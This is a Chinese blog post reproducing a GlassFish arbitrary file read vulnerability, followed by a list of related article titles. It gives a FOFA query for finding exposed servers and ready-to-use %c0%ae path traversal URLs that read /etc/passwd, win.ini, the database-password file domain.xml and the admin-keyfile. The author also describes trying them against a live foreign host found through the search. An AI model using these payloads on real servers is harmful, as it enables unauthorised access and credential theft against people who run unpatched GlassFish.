glassfish任意文件读取漏洞

  • 1.简介
    • 1.1.漏洞类型
    • 1.2.漏洞成因
    • 1.3.语法搜索
    • 1.4.影响版本
  • 2.漏洞复现
    • 2.1.POC
    • 2.2.访问地址
    • 2.3.GlassFish的敏感目录
      • 2.3.1.获取数据库密码
      • 2.3.2.获取GlassFish的后台密码
    • 2.4.POC脚本

1.简介

  GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。

1.1.漏洞类型

  任意文件读取:可以利用此漏洞读取到受害机的任意文件。

1.2.漏洞成因

  GlassFish 漏洞成因: java语义中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点)。

1.3.语法搜索

  FOFA:“GlassFish” && port=“4848”

1.4.影响版本

  GlassFish< 4.1.1(不含 4.1.1)

2.漏洞复现

  这里直接使用fofa语法进行搜索,这里是发现一个国外的地址,需要注意的是看版本,版本不要搞错了。

2.1.POC

Windows:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
Linux:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

  需要注意的是后面跟着的路径是有所不同的,比如Linux系统使用是的/ect/passwd而Windows则是/windows/win.ini。当然这个路径也可以替换,并非一定使用这个路径。

2.2.访问地址

https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

2.3.GlassFish的敏感目录

domains/domain1/config/domain.xml 各种数据库密码位置
domains/domain1/config/admin-keyfile 后台密码存储位置

2.3.1.获取数据库密码

https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/domain.xml

2.3.2.获取GlassFish的后台密码

https://IP地址:端口/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config/admin-keyfile

  这里得出的密码是以sha256的密文加密的方式,需要再相关的平台进行解密,我找了半天也没找到相关的解密办法,同时也未解码成功。

2.4.POC脚本

  脚本地址:POC脚本
  这个脚本用法上面都有介绍,我这边从fofa中找了几个手动测试了一下,以及使用脚本测试了一下,没搞懂,手动测试是存在的,但是脚本测试好像是没检测到。不知道是不是存在一些误差。

glassfish任意文件读取漏洞相关推荐

  1. 应用服务器Glassfish任意文件读取漏洞

    catalogue 1. 前言和技术背景 2. Glassfish安装配置 3. 漏洞利用 4. 漏洞缓解(修复) 1. 前言和技术背景 0x1: GlassFish是什么 GlassFish 是用于 ...

  2. GlassFish 任意文件读取

    一. 漏洞描述 glassfish是一款java编写的跨平台的开源的应用服务器.2015年10月,被爆出通用任意文件读取漏洞.利用这个漏洞,攻击者可读取服务器上任意文件. 与宽字节SQL注入一致,都是 ...

  3. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

  4. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

  5. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

  6. gitlab 更新文件_GitLab任意文件读取漏洞公告

    2020年4月28日,GitLab的一个任意文件读取漏洞的漏洞细节被公开.该漏洞补丁于2020年3月26号由GitLab官方发布.深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告. 漏洞 ...

  7. phpcms前台注入导致任意文件读取漏洞

    关于:phpcms前台注入导致任意文件读取漏洞的修复问题 简介: phpcms的/phpcms/modules/content/down.php文件中,对输入参数 $_GET['a_k']未进行严格过 ...

  8. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  9. php mail执行命令,PHPMailer 命令执行 任意文件读取漏洞利用 【含POC】

    PHPMailer 命令执行漏洞(CVE-2016-10033) 漏洞编号:CVE-2016-10033 影响版本:PHPMailer< 5.2.18 漏洞级别: 高危 漏洞POC: PHPMa ...

最新文章

  1. PCB天线无线模组如何布局摆放?
  2. 【Android UI设计与开发】第05期:引导界面(五)实现应用程序只启动一次引导界面
  3. ASP.NET网页中RAR、DOC、PDF等文件下载功能实例源代码
  4. Riding the Fences USACO 3.3 欧拉路径(dfs+floodfill)
  5. 代理服务器ip地址如何获得_详细教程:如何使用代理服务器进行网页抓取?
  6. 认证考试介绍之RHCE篇
  7. Javascript 获取和设置日期
  8. VS Code 的常用快捷键
  9. java编译命令带参数_java编译命令基础知识点
  10. c 通过jni调用java_使用c通过jni调用java
  11. 20.Yii 工作流
  12. qtp java_QTP Java swing 一些控件的遍历
  13. android设置闹钟组件,Android 设置系统闹钟
  14. JS 获取中国、各省、各市、各区的边界经纬度点集
  15. Unity中Combined Mesh (root: scene)的解决方法
  16. 【前端】【请求】什么是websocket?
  17. 电影点评系统论文java_java电影在线定制影评管理系统
  18. Mac上好用的连接服务器的工具(Termius)
  19. 冷战 (并查集按秩归并)
  20. 【三维目标检测】Second 模型 (一)

热门文章

  1. Adobe photoshop cc 总是安装失败的解决方法
  2. Junit的入门知识
  3. Wonderware-InTouch通过WebBrowser控件嵌入第三方MES网页的问题
  4. 第十六章——保存、加载数据和应用程序状态
  5. 知识图谱发展报告(2018)笔记/思维导图
  6. 聊天界面-自适应文字
  7. 试题 F: 统计子矩阵
  8. 目标检测从入门到精通—概述(一)
  9. Word基本操作以及实用小技巧
  10. 2021年数学建模国赛C题问题三详细思路和代码